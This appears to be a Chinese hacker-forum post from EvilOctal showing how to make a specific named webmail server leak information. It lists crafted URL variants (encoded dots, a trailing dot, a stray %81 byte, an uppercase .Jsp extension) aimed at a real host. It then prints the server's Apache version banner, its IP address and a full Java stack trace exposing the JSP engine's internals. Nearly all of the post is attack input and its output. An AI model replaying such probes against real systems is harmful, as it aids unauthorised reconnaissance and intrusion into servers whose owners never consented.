文章作者:exploit[EST]
信息来源:邪恶八进制(
www.EvilOctal.com)
正常页面:
http://vip.hl.cn/webmail/default.jsp
提交:
http://vip.hl.cn/webmail/default.jsp.%2e
http://vip.hl.cn/webmail/default.jsp.
http://vip.hl.cn/webmail/default.jsp%81
暴出:
Not Found
The requested URL /webmail/default.jsp.. was not found on this server.
--------------------------------------------------------------------------------
Apache/1.3.27 Server at 221.208.245.51 Port 80
提交:
http://vip.hl.cn/webmail/default.Jsp
暴出:
naisa.crane.FastJspException: 无法编译JSP:
/we
at naisa.crane.a.b.a(Unknown Source)
at naisa.crane.h$b.a(Unknown Source)
at naisa.crane.h$b.a(Unknown Source)
at naisa.crane.h.service(Unknown Source)
at naisa.crane.JspServlet.service(Unknown Source)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:856)
at naisa.ibis.ServletContainer.runServlet(ServletContainer.java:282)
at naisa.ibis.ServletEngine.handleConnection(ServletEngine.java:70)
at naisa.ibis.proxy.ProxyServiceHandler.handleRequest(ProxyServiceHandler.java:59)
at naisa.ibis.service.ThreadPoolHandler.run(ThreadPoolHandler.java:81)
Caused by: java.io.FileNotFoundException: /we
at naisa.crane.compiler.y.a(Unknown Source)
at naisa.crane.compiler.y.a(Unknown Source)
at naisa.crane.compiler.y.(Unknown Source)
at naisa.crane.compiler.v.a(Unknown Source)
... 10 more
The cause:
java.io.FileNotFoundException: /we
at naisa.crane.compiler.y.a(Unknown Source)
at naisa.crane.compiler.y.a(Unknown Source)
at naisa.crane.compiler.y.(Unknown Source)
at naisa.crane.compiler.v.a(Unknown Source)
at naisa.crane.a.b.a(Unknown Source)
at naisa.crane.h$b.a(Unknown Source)
at naisa.crane.h$b.a(Unknown Source)
at naisa.crane.h.service(Unknown Source)
at naisa.crane.JspServlet.service(Unknown Source)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:856)
at naisa.ibis.ServletContainer.runServlet(ServletContainer.java:282)
at naisa.ibis.ServletEngine.handleConnection(ServletEngine.java:70)
at naisa.ibis.proxy.ProxyServiceHandler.handleRequest(ProxyServiceHandler.java:59)
at naisa.ibis.service.ThreadPoolHandler.run(ThreadPoolHandler.java:81)